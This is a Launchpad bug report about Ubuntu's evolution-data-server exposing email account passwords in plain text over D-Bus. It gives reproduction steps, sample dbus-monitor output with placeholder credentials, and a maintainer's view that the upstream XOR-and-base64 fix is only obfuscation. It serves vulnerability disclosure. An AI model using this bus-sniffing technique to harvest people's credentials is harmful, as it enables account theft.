Ubuntu
evolution-data-server package

org.gnome.evolution.dataserver.Source completely unveils account credentials in plain text while using dbus-monitor

Bug #1828124 reported by Norbert
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
evolution-data-server
Fix Released
Unknown
evolution-data-server (Ubuntu)
Won't Fix
High
Unassigned

Bug Description

Steps to reproduce:
1. Install Ubuntu 16.04 LTS
2. Install Evolution
3. Set-up Google account with default settings (this will end with e-mail and calendar)
4. Reboot
5. Open evolution Calendar and/or indicator-datetime
6. Launch `dbus-monitor`

Expected results:
* Evolution does not show account credentials in plain text in `dbus-monitor` output

Actual results:
* Evolution shows account credentials in plain text in `dbus-monitor` output:

method call time=1557268474.383095 sender=:1.74 -> destination=:1.40 serial=939 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=InvokeAuthenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
   ]
method return time=1557268474.383686 sender=:1.40 -> destination=:1.74 serial=366 reply_serial=939
signal time=1557268474.389206 sender=:1.40 -> destination=(null destination) serial=367 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
   ]

signal time=1557268520.956861 sender=:1.40 -> destination=(null destination) serial=408 path=/org/gnome/evolution/dataserver/SourceManager/Source_19; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
      string "username:real@email"
   ]
signal time=1557268520.960443 sender=:1.40 -> destination=(null destination) serial=409 path=/org/gnome/evolution/dataserver/SourceManager/Source_18; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
      string "username:real@email"
   ]
signal time=1557268520.964374 sender=:1.40 -> destination=(null destination) serial=410 path=/org/gnome/evolution/dataserver/SourceManager/Source_20; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
      string "username:real@email"
   ]

-----
This is huge security flaw. The malicious script can parse `dbus-monitor` output...
Not sure about more recent Ubuntu and Evolution versions.

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: evolution-data-server-common 3.18.5-1ubuntu1.1
ProcVersionSignature: Ubuntu 4.4.0-143.169-generic 4.4.170
Uname: Linux 4.4.0-143-generic x86_64
ApportVersion: 2.20.1-0ubuntu2.18
Architecture: amd64
CurrentDesktop: Unity
Date: Wed May 8 01:40:27 2019
InstallationDate: Installed on 2018-01-04 (488 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
PackageArchitecture: all
SourcePackage: evolution-data-server
UpgradeStatus: No upgrade log present (probably fresh install)

Revision history for this message
Norbert (nrbrtx) wrote :
Revision history for this message
Alex Murray (alexmurray) wrote :

I am not certain this consitutes a security vulnerability however I would be interested to know the upstream developers' opinions - could you please file a bug with the upstream project in this regard? https://gitlab.gnome.org/GNOME/evolution-data-server/issues/new?issue%5Bassignee_id%5D=&issue%5Bmilestone_id%5D=

Changed in evolution-data-server (Ubuntu):
status: New → Incomplete
Revision history for this message
Norbert (nrbrtx) wrote :

Done https://gitlab.gnome.org/GNOME/evolution-data-server/issues/113 .

Showing password in plain text is insecure in any way.
It may be stolen by malicious application, which ran in behalf of current user account.
As the result e-mail account may be compromised and used for spam and/or other malicious purposes.

Revision history for this message
Alex Murray (alexmurray) wrote :

Thanks - I am guessing that bug is private as I can't see it - I just get a 404 - can you please let me know what upstream says?

Revision history for this message
Norbert (nrbrtx) wrote :

The bug-report on GitLab is now public, they created a patchset for it.

So we can transform this bug-report here to public.

Seth Arnold (seth-arnold)
information type: Private Security → Public Security
Bug Watch Updater (bug-watch-updater)
Changed in evolution-data-server:
status: Unknown → New
Sebastien Bacher (seb128)
Changed in evolution-data-server (Ubuntu):
importance: Undecided → High
status: Incomplete → Triaged
Revision history for this message
Alex Murray (alexmurray) wrote :

From a security PoV this is basic security by obscurity and effectively pointless - they are simply XORing each byte with a fixed value and then base64 encoding it - since the source code is public anyone can easily find this out and hence easily decode it - the only way to do this securely would be to have the DBus peers negotiate a session key and encrypt it properly using this - so I don't think there is any point adding this faux-encryption in this case.

Bug Watch Updater (bug-watch-updater)
Changed in evolution-data-server:
status: New → Fix Released
Sebastien Bacher (seb128)
Changed in evolution-data-server (Ubuntu):
status: Triaged → Won't Fix
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.